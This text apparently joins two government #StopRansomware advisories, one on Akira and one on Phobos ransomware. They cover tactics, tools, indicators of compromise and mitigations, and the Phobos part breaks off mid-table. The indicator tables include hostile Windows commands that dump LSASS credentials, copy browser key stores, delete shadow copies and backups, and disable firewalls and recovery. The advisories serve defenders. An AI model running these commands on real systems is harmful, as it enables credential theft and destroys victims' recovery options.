The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured[1], mostly using known Cisco vulnerabilities [T1190] CVE-2020-3259 and CVE-2023-20269.[2],[3],[4] Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) [T1133], spear phishing [T1566.001][T1566.002], and the abuse of valid credentials[T1078].[4]
Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [T1136.002] to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named itadm
.
According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting[5], to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS) [T1003.001].[6] Akira threat actors also use credential scraping tools [T1003] like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes [T1016] and net
Windows commands are used to identify domain controllers [T1018] and gather information on domain trust relationships [T1482].
See Table 1 for a descriptive listing of these tools.
Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific “Megazord” ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, “Akira_v2”).
As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver[4] and terminate antivirus-related processes [T1562.001].
Akira threat actors leverage tools such as FileZilla, WinRAR [T1560.001], WinSCP, and RClone to exfiltrate data [T1048]. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega [T1537] to connect to exfiltration servers.
Akira threat actors use a double-extortion model [T1657] and encrypt systems [T1486] after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via a .onion
URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting.
Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange [T1486]. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a .akira
or .powerranges
extension. To further inhibit system recovery, Akira’s encryptor (w.exe
) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems [T1490]. Additionally, a ransom note named fn.txt
appears in both the root directory (C:
) and each users’ home directory (C:Users
).
Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it’s written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including:
-p --encryption_path (targeted file/folder paths)
-s --share_file (targeted network drive path)
-n --encryption_percent (percentage of encryption)
--fork (create a child process for encryption
The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using “vmonly
” and the ability to stop running virtual machines with “stopvm
” functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension “akiranew
” or add a ransom note named “akiranew.txt
” in directories where files were encrypted with the new nomenclature.
Table 1 lists publicly available tools and applications Akira threat actors have used, including legitimate tools repurposed for their operations. Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.
Name | Description |
---|---|
AdFind | AdFind.exe is used to query and retrieve information from Active Directory. |
Advanced IP Scanner | A network scanner is used to locate all the computers on a network and conduct a scan of their ports. The program shows all network devices, gives access to shared folders, and provides remote control of computers (via RDP and Radmin). |
AnyDesk | A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer. |
LaZagne | Allows users to recover stored passwords on Windows, Linux, and OSX systems. |
PCHunter64 | A tool used to acquire detailed process and system information [T1082].[7] |
PowerShell | A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. |
Mimikatz | Allows users to view and save authentication credentials such as Kerberos tickets. |
Ngrok | A reverse proxy tool [T1090] used to create a secure tunnel to servers behind firewalls or local machines without a public IP address. |
RClone | A command line program used to sync files with cloud storage services [T1567.002] such as Mega. |
SoftPerfect | A network scanner (netscan.exe ) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters. |
WinRAR | Used to split compromised data into segments and to compress [T1560.001] files into .RAR format for exfiltration. |
WinSCP | Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Akira threat actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts. |
Disclaimer: Investigation or vetting of these indicators is recommended prior to taking action, such as blocking.
File Name | Hash (SHA-256) | Description |
---|---|---|
w.exe | d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca | Akira ransomware |
Win.exe | dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e | Akira ransomware encryptor |
AnyDesk.exe | bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138 | Remote desktop application |
Gcapi.dll | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf | DLL file that assists with the execution of AnyDesk.exe |
Sysmon.exe | 1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386 | Ngrok tool for persistence |
Config.yml | Varies by use | Ngrok configuration file |
Rclone.exe | aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 | Exfiltration tool |
Winscp.rnd | 7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4 | Network file transfer program |
WinSCP-6.1.2-Setup.exe | 36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c | Network file transfer program |
Akira_v2 |
3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75 0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c |
Akira_v2 ransomware |
Megazord |
ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198 131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07 9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c 9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065 2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83 7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be 95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a 0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0 |
Akira “Megazord” ransomware |
VeeamHax.exe | aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d | Plaintext credential leaking tool |
Veeam-Get-Creds.ps1 | 18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88 | PowerShell script for obtaining and decrypting accounts from Veeam servers |
PowershellKerberos TicketDumper | 5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32 | Kerberos ticket dumping tool from LSA cache |
sshd.exe | 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 | OpenSSH Backdoor |
sshd.exe | 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 | OpenSSH Backdoor |
ipscan-3.9.1-setup.exe | 892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0 | Network scanner that scans IP addresses and ports |
File Name | Hash (MD5) | Description |
---|---|---|
winrar-x64-623.exe | 7a647af3c112ad805296a22b2a276e7c | Network file transfer program |
Persistence and Discovery |
---|
nltest /dclist: [T1018] |
nltest /DOMAIN_TRUSTS [T1482] |
net group “Domain admins” /dom [T1069.002] |
net localgroup “Administrators” /dom [T1069.001] |
tasklist [T1057] |
rundll32.exe c:WindowsSystem32comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:windowstemplsass.dmp full [T1003.001] |
Credential Access |
---|
cmd.exe /Q /c esentutl.exe /y "C:Users<username>AppDataRoamingMozillaFirefoxProfiles<firefox_profile_id>.default-releasekey4.db" /d "C:Users<username>AppDataRoamingMozillaFirefoxProfiles<firefox_profile_id>.default-releasekey4.db.tmp” Note: Used for accessing Firefox data. |
Impact |
---|
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" [T1490] |
See Tables 4 -12 for all referenced Akira threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Technique Title | ID | Use |
---|---|---|
Valid Accounts | T1078 | Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access. |
Exploit Public Facing Application | T1190 | Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems. |
External Remote Services | T1133 | Akira threat actors have used remote access services, such as RDP/VPN connection to gain initial access. |
Phishing: Spearphishing Attachment | T1566.001 | Akira threat actors use phishing emails with malicious attachments to gain access to networks. |
Phishing: Spearphishing Link | T1566.002 | Akira threat actors use phishing emails with malicious links to gain access to networks. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping | T1003 | Akira threat actors use tools like Mimikatz and LaZagne to dump credentials. |
OS Credential Dumping: LSASS Memory |
T1003.001 | Akira threat actors attempt to access credential material stored in the process memory of the LSASS. |
Technique Title | ID | Use |
---|---|---|
System Network Configuration Discovery | T1016 | Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure. |
System Information Discovery | T1082 | Akira threat actors use tools like PCHunter64 to acquire detailed process and system information. |
Domain Trust Discovery | T1482 | Akira threat actors use the net Windows command to enumerate domain information. |
Process Discovery | T1057 | Akira threat actors use the Tasklist utility to obtain details on running processes via PowerShell. |
Permission Groups Discovery: Local Groups | T1069.001 | Akira threat actors use the net localgroup /dom to find local system groups and permission settings. |
Permission Groups Discovery: Domain Groups | T1069.002 | Akira threat actors use the net group /domain command to attempt to find domain level groups and permission settings. |
Remote System Discovery | T1018 | Akira threat actors use nltest / dclist to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network. |
Technique Title | ID | Use |
---|---|---|
Create Account: Domain Account | T1136.002 | Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence. |
Technique Title | ID | Use |
---|---|---|
Impair Defenses: Disable or Modify Tools | T1562.001 | Akira threat actors use BYOVD attacks to disable antivirus software. |
Technique Title | ID | Use |
---|---|---|
Remote Access Software | T1219 | Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems. |
Proxy | T1090 | Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data. |
Technique Title | ID | Use |
---|---|---|
Archive Collected Data: Archive via Utility | T1560.001 | Akira threat actors use tools like WinRAR to compress files. |
Technique Title | ID | Use |
---|---|---|
Exfiltration Over Alternative Protocol | T1048 | Akira threat actors use file transfer tools like WinSCP to transfer data. |
Transfer Data to Cloud Account | T1537 | Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfil servers they control. |
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data. |
Technique Title | ID | Use |
---|---|---|
Date Encrypted for Impact | T1486 | Akira threat actors encrypt data on target systems to interrupt availability to system and network resources. |
Inhibit System Recovery | T1490 | Akira threat actors delete volume shadow copies on Windows systems. |
Financial Theft | T1657 | Akira threat actors use a double-extortion model for financial gain. |
The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, EC3 and NCSC-NL recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Your organization has no obligation to respond or provide information back to the FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.
The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.
The FBI, CISA, EC3, and NCSC-NL do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or (888) 282-0870).
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA.
Cisco and Sophos contributed to this advisory.
April 18, 2024: Initial version.
]]>Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.[1],[2]
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Phobos ransomware and other ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of indicators of compromise (IOCs), see:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
According to open source reporting, Phobos ransomware is likely connected to numerous variants (including Elking, Eight, Devos, Backmydata, and Faust ransomware) due to similar TTPs observed in Phobos intrusions. Phobos ransomware operates in conjunction with various open source tools such as Smokeloader, Cobalt Strike, and Bloodhound. These tools are all widely accessible and easy to use in various operating environments, making it (and associated variants) a popular choice for many threat actors.[3],[4]
Phobos actors typically gain initial access to vulnerable networks by leveraging phishing campaigns [T1598] to drop hidden payloads or using internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for vulnerable Remote Desktop Protocol (RDP) ports [T1595.001] or by leveraging RDP on Microsoft Windows environments.[5],[6]
Once they discover an exposed RDP service, the actors use open source brute force tools to gain access [T1110]. If Phobos actors gain successful RDP authentication [T1133][T1078] in the targeted environment, they perform open source research to create a victim profile and connect the targeted IP addresses to their associated companies [T1593]. Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network [T1219].[7]
Alternatively, threat actors send spoofed email attachments [T1566.001] that are embedded with hidden payloads [T1204.002] such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. After SmokeLoader’s hidden payload is downloaded onto the victim’s system, threat actors use the malware’s functionality to download the Phobos payload and exfiltrate data from the compromised system.
Phobos actors run executables like 1saas.exe
or cmd.exe
to deploy additional Phobos payloads that have elevated privileges enabled [TA0004]. Additionally, Phobos actors can use the previous commands to perform various windows shell functions. The Windows command shell enables threat actors to control various aspects of a system, with multiple permission levels required for different subsets of commands [T1059.003][T1105].[8]
Phobos operations feature a standard three phase process to decrypt a payload that allows the threat actors to deploy additional destructive malware.[9]
For the first phase, Smokeloader manipulates either VirtualAlloc
or VirtualProtect API
functions—which opens an entry point, enabling code to be injected into running processes and allowing the malware to evade network defense tools [T1055.002]. In the second phase, a stealth process is used to obfuscate command and control (C2) activity by producing requests to legitimate websites [T1001.003].[10]
Within this phase, the shellcode also sends a call from the entry point to a memory container [T1055.004] and prepares a portable executable for deployment in the final stage [T1027.002][T1105][T1140].
Finally, once Smokeloader reaches its third stage, it unpacks a program-erase cycle from stored memory, which is then sent to be extracted from a SHA 256 hash as a payload.[7] Following successful payload decryption, the threat actors can begin downloading additional malware.
Phobos ransomware actors have been observed bypassing organizational network defense protocols by modifying system firewall configurations using commands like netsh firewall set opmode mode=disable
[T1562.004]. Additionally, Phobos actors can evade detection by using the following tools: Universal Virus Sniffer, Process Hacker, and PowerTool [T1562].
According to open source reporting, Phobos ransomware uses commands such as Exec.exe
or the bcdedit[.]exe
control mechanism. Phobos has also been observed using Windows Startup folders and Run Registry Keys such as C:/UsersAdminAppDataLocaldirectory
[T1490][T1547.001] to maintain persistence within compromised environments.[5]
Additionally, Phobos actors have been observed using built-in Windows API functions [T1106] to steal tokens [T1134.001], bypass access controls, and create new processes to escalate privileges by leveraging the SeDebugPrivilege
process [T1134.002]. Phobos actors attempt to authenticate using cached password hashes on victim machines until they reach domain administrator access [T1003.005].
Phobos actors additionally use open source tools [T1588.002] such as Bloodhound and Sharphound to enumerate the active directory [T1087.002]. Mimikatz and NirSoft, as well as Remote Desktop Passview to export browser client credentials [T1003.001][T1555.003], have also been used. Furthermore, Phobos ransomware is able to enumerate connected storage devices [T1082], running processes [T1057], and encrypt user files [T1083].
Phobos actors have been observed using WinSCP
and Mega.io
for file exfiltration.[11] They use WinSCP
to connect directly from a victim network to an FTP server [T1071.002] they control [TA0010]. Phobos actors install Mega.io
[T1048] and use it to export victim files directly to a cloud storage provider [T1567.002]. Data is typically archived as either a .rar
or .zip
file [T1560] to be later exfiltrated. They target legal documentation, financial records, technical documents (including network architecture), and databases for commonly used password management software [T1555.005].
After the exfiltration phase, Phobos actors then hunt for backups. They use vssadmin.exe
and Windows Management Instrumentation command-line utility (WMIC) to discover and delete volume shadow copies in Windows environments. This prevents victims from recovering files after encryption has taken place [T1047][T1490].
Phobos.exe
contains functionality to encrypt all connected logical drives on the target host [T1486]. Each Phobos ransomware executable has unique build identifiers (IDs), affiliate IDs, as well as a unique ransom note which is embedded in the executable. After the ransom note has populated on infected workstations, Phobos ransomware continues to search for and encrypt additional files.
Most extortion [T1657] occurs via email; however, some affiliate groups have used voice calls to contact victims. In some cases, Phobos actors have used onion sites to list victims and host stolen victim data. Phobos actors use various instant messaging applications such as ICQ, Jabber, and QQ to communicate [T1585]. See Figure 2 for a list of email providers used by the following Phobos affiliates: Devos, Eight, Elbie, Eking, and Faust.[6]
See Table 1 through 6 for IOCs obtained from CISA and the FBI investigations from September through November 2023.
Associated Phobos Domains |
---|
adstat477d[.]xyz |
demstat577d[.]xyz [12] |
serverxlogs21[.]xyz |
Shell Commands |
---|
vssadmin delete shadows /all /quiet [T1490] |
netsh advfirewall set currentprofile state off |
wmic shadowcopy delete |
netsh firewall set opmode mode=disable [T1562.004] |
bcdedit /set {default} bootstatuspolicy ignoreallfailures [T1547.001] |
bcdedit /set {default} recoveryenabled no [T1490] |
wbadmin delete catalog -quiet |
mshta C:%USERPROFILE%Desktopinfo.hta [T1218.005] |
mshta C:%PUBLIC%Desktopinfo.hta |
mshta C:info.hta |
The commands above are observed during the execution of a Phobos encryption executable. A Phobos encryption executable spawns a cmd.exe
process, which then executes the commands listed in Table 1 with their respective Windows system executables. When the commands above are executed on a Windows system, volume shadow copies are deleted and Windows Firewall is disabled. Additionally, the system’s boot status policy is set to boot even when there are errors during the boot process, and automatic recovery options, like Windows Recovery Environment (WinRE), are disabled for the given boot entry. The system’s backup catalog is also deleted. Finally, the Phobos ransom note is displayed to the end user using mshta.exe
.
Registry Keys |
---|
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun<Phobos exe name> |
C:/UsersAdminAppDataLocaldirectory |
Email Addresses | |
AlbetPattisson1981@protonmail[.]com |
henryk@onionmail[.]org |
atomicday@tuta[.]io |
info@fobos[.]one |
axdus@tuta[.]io |
it.issues.solving@outlook[.]com |
barenuckles@tutanota[.]com |
JohnWilliams1887@gmx[.]com |
Bernard.bunyan@aol[.]com |
jonson_eight@gmx[.]us |
bill.g@gmx[.]com |
joshuabernandead@gmx[.]com |
bill.g@msgsafe[.]io |
LettoIntago@onionmail[.]com |
bill.g@onionmail[.]org |
Luiza.li@tutanota[.]com |
bill.gTeam@gmx[.]com |
MatheusCosta0194@gmx[.]com |
blair_lockyer@aol[.]com |
mccreight.ellery@tutanota[.]com |
CarlJohnson1948@gmx[.]com |
megaport@tuta[.]io |
cashonlycash@gmx[.]com |
miadowson@tuta[.]io |
chocolate_muffin@tutanota[.]com |
MichaelWayne1973@tutanota[.]com |
claredrinkall@aol[.]com |
normanbaker1929@gmx[.]com |
clausmeyer070@cock[.]li |
nud_satanakia@keemail[.]me |
colexpro@keemail[.]me |
please@countermail[.]com |
cox.barthel@aol[.]com |
precorpman@onionmail[.]org |
crashonlycash@gmx[.]com |
recovery2021@inboxhub[.]net |
everymoment@tuta[.]io |
recovery2021@onionmail[.]org |
expertbox@tuta[.]io |
SamuelWhite1821@tutanota[.]com |
fastway@tuta[.]io |
SaraConor@gmx[.]com |
fquatela@techie[.]com |
secdatltd@gmx[.]com |
fredmoneco@tutanota[.]com |
skymix@tuta[.]io |
getdata@gmx[.]com |
sory@countermail[.]com |
greenbookBTC@gmx[.]com |
spacegroup@tuta[.]io |
greenbookBTC@protonmail[.]com |
stafordpalin@protonmail[.]com |
helperfiles@gmx[.]com |
starcomp@keemail[.]me |
helpermail@onionmail[.]org |
xdone@tutamail[.]com |
helpfiles@onionmail[.]org |
xgen@tuta[.]io |
helpfiles102030@inboxhub[.]net |
xspacegroup@protonmail[.]com |
helpforyou@gmx[.]com |
zgen@tuta[.]io |
helpforyou@onionmail[.]org |
zodiacx@tuta[.]io |
Telegram Username |
---|
@phobos_support |
Wickr Address |
---|
|
Disclaimer: Organizations are encouraged to investigate the use of the IOCs in Table 7 for related signs of compromise prior to performing remediation actions.
Associated IP Address | File Type | File Name | SHA 256 Hash |
---|---|---|---|
194.165.16[.]4 (October 2023) |
Win32.exe |
Ahpdate.exe [13] |
0000599cbc6e5b0633c5a6261c79e4d3d81005c77845c6b0679d854884a8e02f |
45.9.74[.]14 (December 2023) 147.78.47[.]224 (December 2023) |
Executable and Linkable Format (ELF) [14] |
1570442295 (Trojan Linux Mirai) |
7451be9b65b956ee667081e1141531514b1ec348e7081b5a9cd1308a98eec8f0 |
185.202.0[.]111 (September 2023) |
Win32.exe [15] |
cobaltstrike_shellcode[.]exe (C2 activity) |
|
185.202.0[.]111 (December 2023) |
.txt [16] |
f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c.bin (Trojan) |
Disclaimer: Organizations are encouraged to investigate the use of the file hashes in Tables 8 and 9 for related signs of compromise prior to performing remediation actions.
Phobos Ransomware SHA 256 Malicious Trojan Executable File Hashes |
---|
518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c |
9215550ce3b164972413a329ab697012e909d543e8ac05d9901095016dd3fc6c |
482754d66d01aa3579f007c2b3c3d0591865eb60ba60b9c28c66fe6f4ac53c52 |
c0539fd02ca0184925a932a9e926c681dc9c81b5de4624250f2dd885ca5c4763 |
Phobos Ransomware SHA 256 File Hashes |
58626a9bfb48cd30acd0d95debcaefd188ae794e1e0072c5bde8adae9bccafa6 |
f3be35f8b8301e39dd3dffc9325553516a085c12dc15494a5e2fce73c77069ed |
518544e56e8ccee401ffa1b0a01a10ce23e49ec21ec441c6c7c3951b01c1b19c |
32a674b59c3f9a45efde48368b4de7e0e76c19e06b2f18afb6638d1a080b2eb3 |
2704e269fb5cf9a02070a0ea07d82dc9d87f2cb95e60cb71d6c6d38b01869f66 |
fc4b14250db7f66107820ecc56026e6be3e8e0eb2d428719156cf1c53ae139c6 |
a91491f45b851a07f91ba5a200967921bf796d38677786de51a4a8fe5ddeafd2 |
See Table 10 through 22 for all threat actor tactics and techniques referenced in this advisory.
Technique Title | ID | Use |
---|---|---|
Search Open Websites/Domains |
Phobos actors perform open source research to find information about victims that can be used during targeting to create a victim profile. |
|
Scanning IP Blocks |
Phobos actors used IP scanning tools to include Angry IP Scanner to search for vulnerable RDP ports. |
|
Phishing for Information |
Phobos actors use phishing campaigns to social engineer information from users and gain access to vulnerable RDP ports. |
Technique Title | ID | Use |
---|---|---|
Establish Accounts |
Phobos actors establish accounts to communicate. |
|
Obtain Capabilities: Tool |
Phobos actors used open source tools in their attack. |
Technique Title | ID | Use |
---|---|---|
Valid Accounts |
Following successful RDP authentication, Phobos actors search for IP addresses and pair them with their associated computer to create a victim profile. |
|
External Remote Services |
Phobos actors may leverage external-facing remote services to initially access and/or persist within a network. |
|
Phishing: Spearphishing Attachment |
Phobos actors used a spoofed email attachment to execute attack. |
Technique Title | ID | Use |
---|---|---|
Windows Management Instrumentation |
Phobos actors used Windows Management Instrumentation command-line utility (WMIC) to prevent victims from recovering files. |
|
Windows Command Shell |
Phobos actors can use the previous commands to perform commands with windows shell functions. |
|
Native API |
Phobos actors used open source tools to enumerate the active directory. |
|
Malicious File |
Phobos actors attached a malicious email attachment to deliver ransomware. |
Technique Title | ID | Use |
---|---|---|
Registry Run Keys / Startup Folder |
Phobos ransomware operates using the |
Technique Title | ID | Use |
---|---|---|
Privilege Escalation |
Phobos actors use run commands like |
|
Portable Executable Injection |
Phobos actors use Smokeloader to inject code into running processes to identify an entry point through enabling a |
|
Asynchronous Procedure Call |
During phase two of execution, Phobos ransomware sends a call back from an identified entry point. |
|
Access Token Manipulation: Token Impersonation/Theft |
Phobos actors can use Windows API functions to steal tokens. |
|
Create Process with Token |
Phobos actors used Windows API functions to steal tokens, bypass access controls and create new processes. |
Technique Title | ID | Use |
---|---|---|
Software Packing |
Phobos actors deployed a portable executable (PE) to conceal code. |
|
Embedded Payloads |
Phobos actors embedded the ransomware as a hidden payload by using Smokeloader. |
|
Deobfuscate/Decode Files or Information |
During phase two of execution, Phobos actors’ malware stores and decrypts information. |
|
System Binary Proxy Execution: Mshta |
Phobos actors used Mshta to execute malicious files. |
|
Impair Defenses |
Phobos actors can use Universal Virus Sniffer, Process Hacker, and PowerTool to evade detection. |
|
Disable or Modify System Firewall |
Phobos ransomware has been observed bypassing organizational network defense protocols through modifying system firewall configurations. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping: LSASS Memory |
Phobos actors used Mimikatz to export credentials. |
|
OS Credential Dumping: Cached Domain Credentials |
Phobos actors use cached domain credentials to authenticate as the domain administrator in the event a domain controller is unavailable. |
|
Brute Force |
Phobos actors may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. |
|
Credentials from Password Stores |
Phobos actors may search for common password storage locations to obtain user credentials. |
|
Credentials from Password Stores: Credentials from Web Browsers |
Phobos actors use Nirsoft or Passview to export client credentials from web browsers. Phobos actors search for stored credentials in browser clients once they gain initial network access. |
|
Credentials from Password Stores: Password Managers |
Phobos actors targeted victim’s databases for password management software. |
Technique Title | ID | Use |
---|---|---|
Process Discovery |
Phobos ransomware is able to run processes. |
|
System Information Discovery |
Phobos ransomware is able to enumerate connected storage devices. |
|
File and Directory Discovery |
Phobos ransomware can encrypt user files. |
|
Domain Account |
Phobos threat actor used Bloodhound and Sharphound to enumerate the active directory. |
Technique Title | ID | Use |
---|---|---|
Archive Collected Data |
Phobos threat actors archive data as either a |
Technique Title | ID | Use |
---|---|---|
Data Obfuscation: Protocol Impersonation |
Phobos actors used a stealth process to obfuscate C2 activity. |
|
File Transfer Protocols |
